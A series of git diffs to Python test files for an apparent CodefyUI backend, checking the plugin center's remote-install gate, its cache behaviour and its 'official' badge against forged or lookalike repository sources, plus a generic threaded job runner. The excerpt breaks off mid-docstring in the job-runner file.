+def test_a_loopback_bind_may_install_plugins(host, monkeypatch):
+    monkeypatch.setattr(settings, "HOST", host)
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", False)
+    assert routes_plugins.remote_plugin_install_allowed() is True
+
+
+def test_a_wildcard_bind_may_not_unless_it_opts_in(monkeypatch):
+    monkeypatch.setattr(settings, "HOST", "0.0.0.0")
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", False)
+    assert routes_plugins.remote_plugin_install_allowed() is False
+
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", True)
+    assert routes_plugins.remote_plugin_install_allowed() is True
+
+
+async def test_the_gate_names_the_variable_that_lifts_it(monkeypatch):
+    """A 403 that does not say how to allow the thing is a dead end."""
+    monkeypatch.setattr(settings, "HOST", "192.168.1.20")
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", False)
+
+    with pytest.raises(HTTPException) as refused:
+        await routes_plugins._require_local_plugin_install()
+    assert refused.value.status_code == 403
+    assert "CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL" in refused.value.detail
+
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", True)
+    assert await routes_plugins._require_local_plugin_install() is None
+
+
+async def test_the_catalog_says_when_installing_is_refused(anon_client,
+                                                           monkeypatch):
+    monkeypatch.setattr(settings, "HOST", "0.0.0.0")
+    monkeypatch.setattr(settings, "ALLOW_REMOTE_PLUGIN_INSTALL", False)
+    body = (await anon_client.get("/api/plugins/catalog")).json()
+    assert body["remote_install_allowed"] is False
+
+
+# -- the shared reload -----------------------------------------------------
+
+
+async def test_rediscover_now_answers_what_the_reload_route_answers(
+        test_client):
+    """The route is a one-line call over it, so the two cannot disagree."""
+    response = await test_client.post("/api/plugins/reload")
+    assert response.status_code == 200, response.text
+    over_http = response.json()
+    direct = rediscover_now()
+
+    assert set(direct) == {"builtin", "custom", "plugins", "presets", "total"}
+    assert direct == over_http
+    assert direct["total"] == (direct["builtin"] + direct["custom"]
+                               + direct["plugins"])

--- a/backend/tests/test_api_plugin_center.py
+++ b/backend/tests/test_api_plugin_center.py
@@ -30,6 +30,7 @@ changes place is a diff worth seeing.
 from __future__ import annotations
 
 import json
+import os
 from pathlib import Path
 
 import pytest
@@ -368,6 +369,51 @@ async def test_what_was_installed_beats_what_the_catalog_pins(
     assert by_id["ghost-pack"]["ref"] == ""
 
 
+def test_a_manifest_that_declares_no_chapters_shows_none(tmp_path):
+    """Presence, not truthiness. ``chapters = []`` is a pack saying it
+    teaches no chapter, and the catalog's list is what a row shows when the
+    pack has not said -- not what it shows when the pack said "none"."""
+    plugin_dir = tmp_path / "teaches-nothing"
+    plugin_dir.mkdir()
+    (plugin_dir / "cdui.plugin.toml").write_text(
+        '[plugin]\nid = "teaches-nothing"\nversion = "1.0"\n'
+        "schema_version = 1\n\n[lessons]\nchapters = []\n",
+        encoding="utf-8",
+    )
+    row = CatalogEntry(
+        id="teaches-nothing", name="T", description="", kind="github",
+        repo="alice/t", chapters=("C1", "C2"),
+    )
+
+    payload = listing._entry_payload(
+        "teaches-nothing",
+        row=row,
+        entry={"source_kind": "github_url", "enabled": True},
+        plugin_dir=plugin_dir,
+        tombstoned=False,
+        registry=registry,
+        active_job=None,
+    )
+    assert payload["chapters"] == []
+
+
+def test_a_deleted_node_file_is_a_cache_miss(tmp_path):
+    """The scan cache is keyed on the newest mtime, and deleting a file moves
+    no other file's mtime -- so without the file COUNT in the key, removing a
+    node from a pack would keep advertising it. Mtimes are set explicitly so
+    the deleted file is provably not the newest one."""
+    nodes = tmp_path / "nodes"
+    nodes.mkdir()
+    (nodes / "old.py").write_text('NODE_NAME = "Old"\n', encoding="utf-8")
+    (nodes / "new.py").write_text('NODE_NAME = "New"\n', encoding="utf-8")
+    os.utime(nodes / "old.py", (1_000_000, 1_000_000))
+    os.utime(nodes / "new.py", (2_000_000, 2_000_000))
+
+    assert listing.scan_node_names(nodes) == ["New", "Old"]
+    (nodes / "old.py").unlink()
+    assert listing.scan_node_names(nodes) == ["New"]
+
+
 def test_a_recorded_empty_grant_is_not_a_miss():
     """"You granted this plugin nothing" is an answer. Falling through to
     the manifest there would show an ungranted capability as agreed to."""
@@ -450,10 +496,51 @@ async def test_a_lookalike_url_on_another_host_is_not_that_repository(
     assert row["status"] == "installed"
     assert row["url"] == lookalike
     assert row["official"] is False
+    # Nothing recorded says which repository this is, and ``None`` is that
+    # answer. Falling through to the catalog printed the official
+    # ``owner/repo`` on a row whose files came off another host entirely --
+    # the badge withheld in one field and handed over in the next.
+    assert row["repo"] is None
 
     listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
     assert listed["self-learning"]["official"] is False
     assert listed["self-learning"]["catalog_id"] is None
+
+
+async def test_a_local_link_under_a_catalog_id_points_at_no_repository(
+        anon_client, center_lockfile, tmp_path):
+    """``cdui plugin link`` records the author's own working tree, which is
+    how the author of an official plugin works on it -- so a catalog id over
+    a local link is an ordinary state, not an attack. It is also a state
+    where nothing at all is known about a repository: a working tree is
+    whatever is in it right now. The row says so in both fields rather than
+    borrowing the catalog's repository and its GitHub link."""
+    work = tmp_path / "work" / "self-learning"
+    work.mkdir(parents=True)
+    (work / "cdui.plugin.toml").write_text(
+        '[plugin]\nid = "self-learning"\nname = "My Fork"\n'
+        'version = "0.0.1"\nschema_version = 1\n',
+        encoding="utf-8",
+    )
+    lockfile = plugin_loader.load_lockfile()
+    lockfile["plugins"]["self-learning"] = {
+        "source_kind": "local",
+        "source": str(work),
+        "path": str(work),
+        "installed_at": "2026-06-05T00:00:00Z",
+        "manifest": {"id": "self-learning", "version": "0.0.1"},
+        "trusted_modules": [],
+        "capabilities": [],
+        "enabled": True,
+    }
+    plugin_loader.save_lockfile(lockfile)
+
+    row = (await rows(anon_client))["self-learning"]
+    assert row["status"] == "installed"
+    assert row["source_kind"] == "local"
+    assert row["repo"] is None
+    assert row["url"] is None
+    assert row["official"] is False
 
 
 async def test_the_catalogs_own_repository_is_official_by_any_road(

--- a/backend/tests/test_api_plugin_center.py
+++ b/backend/tests/test_api_plugin_center.py
@@ -41,6 +41,8 @@ from app.api import routes_plugins
 from app.config import settings
 from app.core import plugin_loader
 from app.core.node_registry import registry
+from app.core.plugins import listing
+from app.core.plugins.catalog import CatalogEntry
 from app.core.plugins.listing import catalog_listing
 from app.core.plugins.reload import rediscover_now
 from app.main import app
@@ -59,6 +61,9 @@ ENTRY_KEYS = [
 
 TOP_KEYS = {"entries", "active_job", "remote_install_allowed", "generation"}
 
+#: Deliberately asks for MORE than the lockfile entry below was granted: a
+#: plugin that rewrites its own manifest after install must not be able to
+#: show the new list as though the user had agreed to it.
 EXTERNAL_MANIFEST = """\
 [plugin]
 id = "demo-external"
@@ -66,6 +71,10 @@ name = "Demo External"
 version = "2.0.0"
 description = "Installed from a URL nobody put in the catalog."
 schema_version = 1
+
+[security]
+capabilities = ["network", "filesystem"]
+allowed_modules = ["requests", "pathlib"]
 
 [python_deps]
 tabulate = ">=0.9"
@@ -278,8 +287,10 @@ async def test_a_plugin_the_catalog_never_heard_of_is_external(anon_client):
     assert row["ref"] == "v1.2.3"
     assert row["sha"] == "0" * 40
     assert row["tags"] == []
-    # The lockfile records what was consented to; the manifest says what the
-    # plugin would install.
+    # The lockfile records what was consented to, and its manifest has since
+    # started asking for more -- which must not show as though it had been
+    # agreed to. What the plugin WOULD install is a different question, and
+    # the manifest is the only place that can answer it.
     assert row["capabilities"] == ["network"]
     assert row["trusted_modules"] == ["requests"]
     assert row["python_deps"] == {"tabulate": ">=0.9"}
@@ -319,6 +330,54 @@ async def test_a_running_job_marks_only_its_own_row(center_lockfile):
                                      "current_step": "deps"}
     assert by_id["foundations"]["status"] == "installed"
     assert by_id["foundations"]["job"] is None
+
+
+async def test_what_was_installed_beats_what_the_catalog_pins(
+        center_lockfile, monkeypatch):
+    """A row can be backed by a catalog entry AND by an install that
+    disagrees with it -- a fork, a moved owner, an older tag. The catalog
+    still says whether the plugin is official; where the FILES came from is
+    the install's own answer."""
+    pinned = {
+        plugin_id: CatalogEntry(
+            id=plugin_id, name="Demo", description="", kind="github",
+            repo="carol/demo", ref="v9.9.9", official=True,
+        )
+        for plugin_id in ("demo-external", "ghost-pack")
+    }
+    monkeypatch.setattr(listing, "catalog_entries", lambda: pinned)
+
+    listed = listing.catalog_listing(
+        plugin_loader.load_lockfile(),
+        registry=registry,
+        remote_install_allowed=True,
+        generation=0,
+    )
+    by_id = {e["id"]: e for e in listed["entries"]}
+    entry = by_id["demo-external"]
+
+    assert entry["kind"] == "github"
+    assert entry["official"] is True
+    assert entry["ref"] == "v1.2.3"
+    assert entry["repo"] == "alice/extras"
+    assert entry["url"] == "https://github.com/alice/extras"
+    # "" is the default branch, and it is what this install used -- the
+    # catalog's tag is where a REinstall would go, not where these files
+    # came from.
+    assert by_id["ghost-pack"]["ref"] == ""
+
+
+def test_a_recorded_empty_grant_is_not_a_miss():
+    """"You granted this plugin nothing" is an answer. Falling through to
+    the manifest there would show an ungranted capability as agreed to."""
+    manifest = {"security": {"capabilities": ["network"],
+                             "allowed_modules": ["requests"]}}
+    assert listing.declared_capabilities({"capabilities": []}, manifest) == []
+    assert listing.declared_trusted_modules({"trusted_modules": []}, manifest) == []
+    # A lockfile written before either field existed still asks the manifest.
+    assert listing.declared_capabilities({}, manifest) == ["network"]
+    assert listing.declared_trusted_modules({}, manifest) == ["requests"]
+    assert listing.declared_capabilities(None, manifest) == ["network"]
 
 
 # -- the router ------------------------------------------------------------

--- a/backend/tests/test_api_plugin_center.py
+++ b/backend/tests/test_api_plugin_center.py
@@ -335,9 +335,10 @@ async def test_a_running_job_marks_only_its_own_row(center_lockfile):
 async def test_what_was_installed_beats_what_the_catalog_pins(
         center_lockfile, monkeypatch):
     """A row can be backed by a catalog entry AND by an install that
-    disagrees with it -- a fork, a moved owner, an older tag. The catalog
-    still says whether the plugin is official; where the FILES came from is
-    the install's own answer."""
+    disagrees with it -- a fork, a moved owner, an older tag. Where the FILES
+    came from is the install's own answer, and it is also what decides the
+    badge: a row whose repository is not the catalog's is not official, no
+    matter which id it claims."""
     pinned = {
         plugin_id: CatalogEntry(
             id=plugin_id, name="Demo", description="", kind="github",
@@ -357,7 +358,7 @@ async def test_what_was_installed_beats_what_the_catalog_pins(
     entry = by_id["demo-external"]
 
     assert entry["kind"] == "github"
-    assert entry["official"] is True
+    assert entry["official"] is False   # alice/extras is not carol/demo
     assert entry["ref"] == "v1.2.3"
     assert entry["repo"] == "alice/extras"
     assert entry["url"] == "https://github.com/alice/extras"
@@ -378,6 +379,118 @@ def test_a_recorded_empty_grant_is_not_a_miss():
     assert listing.declared_capabilities({}, manifest) == ["network"]
     assert listing.declared_trusted_modules({}, manifest) == ["requests"]
     assert listing.declared_capabilities(None, manifest) == ["network"]
+
+
+def _install_claiming(user_root: Path, plugin_id: str, repo: str) -> None:
+    """Put *plugin_id* in the lockfile as a URL install of *repo*.
+
+    No ``catalog_id``: this is the free-text ``cdui plugin install
+    owner/repo`` path, which is the one that can claim an id the catalog also
+    uses -- deliberately, since it is how the author of an official plugin
+    installs their own repository.
+    """
+    plugin_dir = user_root / plugin_id
+    plugin_dir.mkdir(parents=True, exist_ok=True)
+    (plugin_dir / "cdui.plugin.toml").write_text(
+        f'[plugin]\nid = "{plugin_id}"\nname = "Claimed"\n'
+        f'version = "0.0.1"\nschema_version = 1\n',
+        encoding="utf-8",
+    )
+    lockfile = plugin_loader.load_lockfile()
+    lockfile["plugins"][plugin_id] = {
+        "source_kind": "github_url",
+        "source": repo,
+        "url": f"https://github.com/{repo}",
+        "ref": "",
+        "installed_at": "2026-06-04T00:00:00Z",
+        "manifest": {"id": plugin_id, "version": "0.0.1"},
+        "trusted_modules": [],
+        "capabilities": [],
+        "enabled": True,
+    }
+    plugin_loader.save_lockfile(lockfile)
+
+
+async def test_a_foreign_repository_cannot_wear_the_catalogs_badge(
+        anon_client, center_lockfile):
+    """The id of a ``github`` catalog row is NOT reserved -- it cannot be,
+    because the plugin's own author installs it by repository. So the badge
+    has to be earned by the repository, not by the name on the manifest."""
+    _install_claiming(center_lockfile, "self-learning", "mallory/evil")
+
+    row = (await rows(anon_client))["self-learning"]
+    assert row["status"] == "installed"
+    assert row["repo"] == "mallory/evil"
+    assert row["official"] is False
+
+    listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
+    assert listed["self-learning"]["official"] is False
+    assert listed["self-learning"]["catalog_id"] == "self-learning"
+
+
+async def test_the_catalogs_own_repository_is_official_by_any_road(
+        anon_client, center_lockfile):
+    """Installed by name or by URL, it is the same code from the same
+    repository -- so the badge must not depend on which command was typed."""
+    _install_claiming(
+        center_lockfile, "self-learning", "CodefyUI/CodefyUI-Plugin-Self-Learning"
+    )
+
+    row = (await rows(anon_client))["self-learning"]
+    assert row["status"] == "installed"
+    assert row["repo"] == "CodefyUI/CodefyUI-Plugin-Self-Learning"
+    assert row["official"] is True
+
+    listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
+    assert listed["self-learning"]["official"] is True
+
+
+def test_official_is_a_question_about_provenance_not_about_the_id():
+    """Every branch of the rule, in one place."""
+    builtin = CatalogEntry(id="stats", name="Stats", description="",
+                           kind="builtin", path="plugins/stats")
+    official_repo = CatalogEntry(
+        id="self-learning", name="SL", description="", kind="github",
+        repo="CodefyUI/CodefyUI-Plugin-Self-Learning", official=True,
+    )
+    listed_third_party = CatalogEntry(
+        id="third", name="Third", description="", kind="github",
+        repo="carol/third", official=False,
+    )
+
+    # Nothing installed: the row itself is what the badge describes.
+    assert listing.is_official(builtin, None) is True
+    assert listing.is_official(official_repo, None) is True
+    # A row the catalog merely LISTS never earns it, installed or not.
+    assert listing.is_official(listed_third_party, None) is False
+    assert listing.is_official(None, None) is False
+
+    # A built-in pack can only arrive by being activated in place.
+    assert listing.is_official(builtin, {"source_kind": "builtin"}) is True
+    assert listing.is_official(
+        builtin, {"source_kind": "local", "source": "/home/me/stats"}) is False
+    assert listing.is_official(
+        builtin, {"source_kind": "github_url", "source": "mallory/stats",
+                  "url": "https://github.com/mallory/stats"}) is False
+
+    # A repository row: the recorded catalog id, or the repository itself.
+    assert listing.is_official(
+        official_repo,
+        {"source_kind": "github_url", "catalog_id": "self-learning",
+         "source": "CodefyUI/CodefyUI-Plugin-Self-Learning"}) is True
+    assert listing.is_official(
+        official_repo,
+        {"source_kind": "github_url",
+         "url": "https://github.com/codefyui/codefyui-plugin-self-learning"}
+    ) is True                                   # GitHub names are not case-sensitive
+    assert listing.is_official(
+        official_repo,
+        {"source_kind": "github_url", "source": "mallory/evil",
+         "url": "https://github.com/mallory/evil"}) is False
+    # A linked working tree cannot be checked against anything.
+    assert listing.is_official(
+        official_repo,
+        {"source_kind": "local", "source": "/home/me/self-learning"}) is False
 
 
 # -- the router ------------------------------------------------------------

--- a/backend/tests/test_api_plugin_center.py
+++ b/backend/tests/test_api_plugin_center.py
@@ -381,13 +381,18 @@ def test_a_recorded_empty_grant_is_not_a_miss():
     assert listing.declared_capabilities(None, manifest) == ["network"]
 
 
-def _install_claiming(user_root: Path, plugin_id: str, repo: str) -> None:
+def _install_claiming(
+    user_root: Path, plugin_id: str, repo: str, url: str | None = None
+) -> None:
     """Put *plugin_id* in the lockfile as a URL install of *repo*.
 
     No ``catalog_id``: this is the free-text ``cdui plugin install
     owner/repo`` path, which is the one that can claim an id the catalog also
     uses -- deliberately, since it is how the author of an official plugin
     installs their own repository.
+
+    *url* overrides the recorded URL, for the entry a hand-edited lockfile
+    can hold: one whose URL is not on GitHub at all.
     """
     plugin_dir = user_root / plugin_id
     plugin_dir.mkdir(parents=True, exist_ok=True)
@@ -400,7 +405,7 @@ def _install_claiming(user_root: Path, plugin_id: str, repo: str) -> None:
     lockfile["plugins"][plugin_id] = {
         "source_kind": "github_url",
         "source": repo,
-        "url": f"https://github.com/{repo}",
+        "url": url if url is not None else f"https://github.com/{repo}",
         "ref": "",
         "installed_at": "2026-06-04T00:00:00Z",
         "manifest": {"id": plugin_id, "version": "0.0.1"},
@@ -425,7 +430,30 @@ async def test_a_foreign_repository_cannot_wear_the_catalogs_badge(
 
     listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
     assert listed["self-learning"]["official"] is False
-    assert listed["self-learning"]["catalog_id"] == "self-learning"
+    # Nor may it borrow the catalog row's identity by another name: a
+    # ``catalog_id`` is a claim that THIS is the pack that card describes,
+    # and a link to a page about different code is the same lie in smaller
+    # print.
+    assert listed["self-learning"]["catalog_id"] is None
+
+
+async def test_a_lookalike_url_on_another_host_is_not_that_repository(
+        anon_client, center_lockfile):
+    """``https://evil.example.com/CodefyUI/CodefyUI-Plugin-Self-Learning``
+    ends in the owner and repository of a plugin CodefyUI vouches for. Any
+    reading of a recorded URL that ignores the host hands the badge over for
+    the price of a domain name."""
+    lookalike = "https://evil.example.com/CodefyUI/CodefyUI-Plugin-Self-Learning"
+    _install_claiming(center_lockfile, "self-learning", lookalike, url=lookalike)
+
+    row = (await rows(anon_client))["self-learning"]
+    assert row["status"] == "installed"
+    assert row["url"] == lookalike
+    assert row["official"] is False
+
+    listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
+    assert listed["self-learning"]["official"] is False
+    assert listed["self-learning"]["catalog_id"] is None
 
 
 async def test_the_catalogs_own_repository_is_official_by_any_road(
@@ -443,6 +471,9 @@ async def test_the_catalogs_own_repository_is_official_by_any_road(
 
     listed = {p["id"]: p for p in (await anon_client.get("/api/plugins")).json()}
     assert listed["self-learning"]["official"] is True
+    # And this one really is the pack that catalog row describes, even
+    # though the install recorded no ``catalog_id`` to say so.
+    assert listed["self-learning"]["catalog_id"] == "self-learning"
 
 
 def test_official_is_a_question_about_provenance_not_about_the_id():

--- a/backend/tests/test_jobs_runner.py
+++ b/backend/tests/test_jobs_runner.py
@@ -25,6 +25,7 @@ file with the pack argument shape taken out.
 from __future__ import annotations
 
 import asyncio
+import logging
 import queue
 import threading
 import time
@@ -124,8 +125,12 @@ class ScriptedWork:
 
     #: How long the worker thread waits for its next instruction before it
     #: gives up. A test that forgets to finish a job fails here with a clear
-    #: message instead of hanging the suite.
-    STARVED_AFTER_S = 20.0
+    #: message instead of hanging the suite. Half of ``drain``'s timeout on
+    #: purpose: at 20.0 the two expired together and the failure a reader saw
+    #: was whichever won the race -- ``drain``'s "job never finished", which
+    #: says nothing about the cause. Giving up first makes the message that
+    #: names the cause the one that arrives.
+    STARVED_AFTER_S = 10.0
 
     def __init__(self) -> None:
         self._steps: "queue.Queue[tuple[str, object]]" = queue.Queue()
@@ -680,8 +685,16 @@ async def test_shutdown_survives_work_that_raised_a_base_exception():
     assert "_OutOfBand" in job.error["message"]
 
 
-async def test_shutdown_is_bounded_when_the_work_ignores_cancellation():
-    """Server shutdown must not be held hostage by stubborn work."""
+async def test_shutdown_is_bounded_when_the_work_ignores_cancellation(caplog):
+    """Server shutdown must not be held hostage by stubborn work.
+
+    The log line is asserted as RENDERED, not as a format string: it is the
+    only trace a job abandoned at shutdown leaves, and ``label`` is the only
+    thing in it that says WHICH runner gave up -- two of them come down in
+    the same lifespan hook. A runner constructed without a label would still
+    log, still pass every other assertion here, and leave that line reading
+    "job did not stop".
+    """
     release = threading.Event()
 
     def deaf(emit: Emit, cancel_check: CancelCheck) -> None:
@@ -694,9 +707,12 @@ async def test_shutdown_is_bounded_when_the_work_ignores_cancellation():
 
     started = time.monotonic()
     try:
-        await runner.shutdown()
+        with caplog.at_level(logging.WARNING, logger="app.core.jobs"):
+            await runner.shutdown()
         assert time.monotonic() - started < 5.0
         assert job.cancel_event.is_set()
+        assert [r.getMessage() for r in caplog.records if r.name == "app.core.jobs"] \
+            == ["demo job did not stop within 0s; leaving it to the interpreter"]
     finally:
         # Let the stubborn work finish so no task outlives the test loop.
         release.set()

--- a/backend/tests/test_jobs_runner.py
+++ b/backend/tests/test_jobs_runner.py
@@ -1,0 +1,703 @@
+"""The generic job runner, with no domain behind it at all.
+
+``JobRunner`` is the single job slot the Package Center and the Plugin Center
+share: one job at a time, its events stamped with a cursor a poller can resume
+from, a cooperative stop and a bounded shutdown. Everything below is about
+that seam and nothing about what a job is FOR -- the domain arrives as two
+callbacks (``work`` and ``terminal_for``) and this module supplies the
+smallest honest ones it can:
+
+* every event is produced on a worker thread and read from the loop, so the
+  lock rules are what is actually under test;
+* the terminal event is stored BEFORE the status that explains it flips,
+  because the other order loses the last event of every job to whoever polls
+  at the wrong moment;
+* the long poll wakes on an EDGE, so no test here sleeps waiting for one;
+* an exception the domain does not claim reaches a terminal state anyway, and
+  then travels on.
+
+``test_packs_service.py`` covers the same runner through the Package Center's
+vocabulary; this file is what a second domain can rely on before it is
+written. The ``ScriptedWork`` driver below is the ``ScriptedFlow`` from that
+file with the pack argument shape taken out.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import queue
+import threading
+import time
+import uuid
+from dataclasses import dataclass
+
+import pytest
+
+from app.core.jobs import (
+    STATUS_CANCELLED,
+    STATUS_DONE,
+    STATUS_FAILED,
+    STATUS_NEEDS_RESTART,
+    STATUS_RUNNING,
+    CancelCheck,
+    Emit,
+    Job,
+    JobBusy,
+    JobRunner,
+    UnknownJob,
+)
+
+# ── the smallest domain that can drive a runner ───────────────────────────
+
+
+class Cancelled(Exception):
+    """The job was asked to stop. NOT a failure -- see :func:`terminal_for`."""
+
+
+class Failed(Exception):
+    """A failure shape this domain designed. ``hint`` is the detail."""
+
+    def __init__(self, message: str, *, hint: str | None = None):
+        super().__init__(message)
+        self.hint = hint
+
+
+class _Abort(BaseException):
+    """A BaseException that is NOT KeyboardInterrupt or SystemExit.
+
+    Those two are special-cased by ``asyncio.Task.__step``, which re-raises
+    them into the event loop itself -- a test using one would tear down the
+    loop rather than exercise the bookkeeping.
+    """
+
+
+def terminal_for(exc: BaseException) -> tuple[str, dict] | None:
+    """A domain's whole answer to "what did that exception do to the job?".
+
+    Deliberately the same shape ``PackService._terminal_for`` has, minus the
+    packs: a cancel is not a failure, a designed failure keeps its message
+    and hint, anything else is a failure reported as its repr -- and a
+    ``BaseException`` is not this domain's to claim, which is what ``None``
+    says.
+    """
+    if isinstance(exc, Cancelled):
+        return STATUS_CANCELLED, {"type": "job_cancelled"}
+    if isinstance(exc, Failed):
+        return STATUS_FAILED, {"type": "job_failed",
+                               "message": str(exc), "hint": exc.hint}
+    if isinstance(exc, Exception):
+        return STATUS_FAILED, {"type": "job_failed",
+                               "message": repr(exc), "hint": None}
+    return None
+
+
+@dataclass(kw_only=True)
+class DemoJob(Job):
+    """A ``Job`` with one field of its own, and that field is REQUIRED.
+
+    Which is the whole point of the keyword-only base: a domain adds what it
+    needs without having to give it a default just to sit after the base's
+    ``status``, ``created_at`` and the rest.
+    """
+
+    name: str
+
+
+class ScriptedWork:
+    """A stand-in for a real job's work, driven from the test thread.
+
+    Real work blocks its thread for minutes at a time, which is exactly the
+    property that makes "while a job is running" hard to test. This one
+    blocks until the test tells it what to do next -- so a test can hold a
+    job open, release ONE event into a parked long poll, and finish, with no
+    sleep anywhere and no wall-clock guesswork.
+
+    It also honours ``cancel_check`` between instructions, the way real work
+    does between its steps, so Stop is exercised for real rather than
+    simulated by setting a status.
+
+    ``emits`` keeps every ``emit`` it was handed. That is the handle a reader
+    thread outliving its job has -- ``packs.runner._pump`` is a DAEMON thread
+    joined with a TIMEOUT -- so a finished job's reader can still be holding
+    one.
+    """
+
+    #: How long the worker thread waits for its next instruction before it
+    #: gives up. A test that forgets to finish a job fails here with a clear
+    #: message instead of hanging the suite.
+    STARVED_AFTER_S = 20.0
+
+    def __init__(self) -> None:
+        self._steps: "queue.Queue[tuple[str, object]]" = queue.Queue()
+        self.started = threading.Event()
+        self.emits: list[Emit] = []
+
+    # ── driven from the test thread ──────────────────────────────────────
+    def send(self, event: dict) -> None:
+        """Make the work emit *event* next."""
+        self._steps.put(("emit", event))
+
+    def fail(self, exc: BaseException) -> None:
+        """Make the work raise *exc* next."""
+        self._steps.put(("raise", exc))
+
+    def finish(self) -> None:
+        """Make the work return successfully next."""
+        self._steps.put(("return", None))
+
+    def script(self, *events: dict) -> "ScriptedWork":
+        """Queue *events* and a successful return; returns self for chaining."""
+        for event in events:
+            self.send(event)
+        self.finish()
+        return self
+
+    # ── runs on the job's worker thread ──────────────────────────────────
+    def __call__(self, emit: Emit, cancel_check: CancelCheck) -> None:
+        self.emits.append(emit)
+        self.started.set()
+        deadline = time.monotonic() + self.STARVED_AFTER_S
+        while True:
+            if cancel_check():
+                raise Cancelled("the job was asked to stop")
+            try:
+                kind, payload = self._steps.get(timeout=0.02)
+            except queue.Empty:
+                if time.monotonic() > deadline:
+                    raise AssertionError(
+                        "scripted work was never told what to do next")
+                continue
+            if kind == "emit":
+                emit(payload)
+            elif kind == "raise":
+                raise payload
+            else:
+                return
+
+
+def make_runner(**kwargs) -> JobRunner:
+    """A runner wired to the domain above. ``label`` shows up in its logs."""
+    return JobRunner(terminal_for=terminal_for, label="demo job", **kwargs)
+
+
+def submit(runner: JobRunner, work, *, name: str = "demo") -> DemoJob:
+    """Claim the slot for a fresh job and run *work* in it.
+
+    The two calls a domain makes, in the order it has to make them: nothing
+    awaits between them, so the generation ``claim`` installs is the one the
+    work's ``emit`` closes over.
+    """
+    job = DemoJob(job_id=uuid.uuid4().hex, name=name)
+    runner.claim(job, {"type": "job_started", "name": name})
+    runner.start(job, work)
+    return job
+
+
+async def drain(runner: JobRunner, job_id: str, *, timeout: float = 20.0
+                ) -> tuple[list[dict], str]:
+    """Every event of *job_id*, waiting for the job to reach a terminal state.
+
+    Edge-triggered like a route would be: each pass parks on the runner's own
+    wake-up rather than sleeping, so a job that finishes in a millisecond is
+    drained in a millisecond.
+    """
+    limit = 500
+    events: list[dict] = []
+    cursor, status = 0, STATUS_RUNNING
+    deadline = time.monotonic() + timeout
+    while True:
+        if time.monotonic() > deadline:
+            raise AssertionError(f"job {job_id} never finished (status={status})")
+        page, cursor, status = await runner.wait_for_events(
+            job_id, after_cursor=cursor, limit=limit, wait=1.0)
+        events.extend(page)
+        # A page cut short by ``limit`` can carry a terminal status without
+        # the terminal event, so both have to be true before we stop.
+        if status != STATUS_RUNNING and len(page) < limit:
+            return events, status
+
+
+async def wait_started(work: ScriptedWork, *, timeout: float = 10.0) -> None:
+    """Yield to the loop until the work's thread is running.
+
+    NOT ``work.started.wait(...)``: that blocks the only thread the event
+    loop has, so the task that would start the work never gets to run and the
+    wait always times out.
+    """
+    deadline = time.monotonic() + timeout
+    while not work.started.is_set():
+        if time.monotonic() > deadline:
+            raise AssertionError("the scripted work never started")
+        await asyncio.sleep(0.01)
+
+
+def types_of(events: list[dict]) -> list[str]:
+    return [event["type"] for event in events]
+
+
+# ── the event stream ──────────────────────────────────────────────────────
+
+
+async def test_the_first_event_is_cursor_one_and_beats_the_work_to_it():
+    """``claim`` buffers it, so a client polling from 0 always sees it first."""
+    runner = make_runner()
+    work = ScriptedWork().script({"type": "log", "line": "hi"})
+    job = submit(runner, work, name="first")
+    events, status = await drain(runner, job.job_id)
+
+    assert types_of(events) == ["job_started", "log", "job_done"]
+    assert events[0]["cursor"] == 1
+    assert events[0]["name"] == "first"
+    assert status == STATUS_DONE
+    assert job.finished_at is not None
+
+
+async def test_every_event_carries_a_monotonic_cursor_and_a_timestamp():
+    runner = make_runner()
+    work = ScriptedWork().script({"type": "log", "line": "a"},
+                                 {"type": "log", "line": "b"})
+    job = submit(runner, work)
+    events, _ = await drain(runner, job.job_id)
+
+    cursors = [event["cursor"] for event in events]
+    assert cursors == sorted(cursors)
+    assert len(set(cursors)) == len(cursors)
+    assert cursors[0] == 1
+    for event in events:
+        # ISO-8601 UTC, so a client can order two jobs' logs against each
+        # other without knowing the server's timezone.
+        assert event["ts"].endswith("+00:00")
+
+
+async def test_the_terminal_event_is_readable_before_the_status_flips():
+    """The invariant a poller depends on, checked from both sides.
+
+    From INSIDE the lock hold: ``_finish`` stores the event while the status
+    still says running, so the buffer is never behind the status. And from
+    outside, on another thread: ``_read`` takes the same lock, so a reader
+    that gets in and sees a terminal status has already been handed the event
+    explaining it. The other order loses the last event of every job to
+    whoever polls at the wrong moment.
+    """
+    runner = make_runner()
+    work = ScriptedWork()
+    job = submit(runner, work)
+    await wait_started(work)
+
+    ordering: list[tuple[str, str]] = []
+    stored = runner._store
+
+    def watched_store(event: dict, owner) -> None:
+        stored(event, owner)
+        # Still inside _finish's lock hold for a terminal event.
+        ordering.append((event.get("type"), job.status))
+
+    runner._store = watched_store
+
+    samples: list[tuple[str, list[str]]] = []
+
+    def poll() -> None:
+        deadline = time.monotonic() + 15.0
+        while time.monotonic() < deadline:
+            page, _, status = runner._read(job, 0, 500)
+            samples.append((status, types_of(page)))
+            if status != STATUS_RUNNING:
+                return
+            time.sleep(0.001)
+
+    reader = threading.Thread(target=poll, name="reader", daemon=True)
+    reader.start()
+    work.finish()
+    await drain(runner, job.job_id)
+    reader.join(10)
+    assert not reader.is_alive(), "the reader thread never saw the job end"
+
+    assert ("job_done", STATUS_RUNNING) in ordering, (
+        "the status flipped before the terminal event was buffered")
+    terminal = [types for status, types in samples if status != STATUS_RUNNING]
+    assert terminal, "the reader never read a terminal status"
+    for types in terminal:
+        assert types[-1] == "job_done", (
+            "a reader was handed a terminal status without the event for it")
+
+
+async def test_a_late_event_from_a_finished_job_never_touches_the_next_one():
+    """A step stamped by whoever emitted it, not by whoever is current.
+
+    ``emit`` is a closure over ONE job's generation, and the thread holding it
+    can outlive the job. If ``_store`` read the current job instead, a line
+    arriving late from a finished job would set ``current_step`` on the job
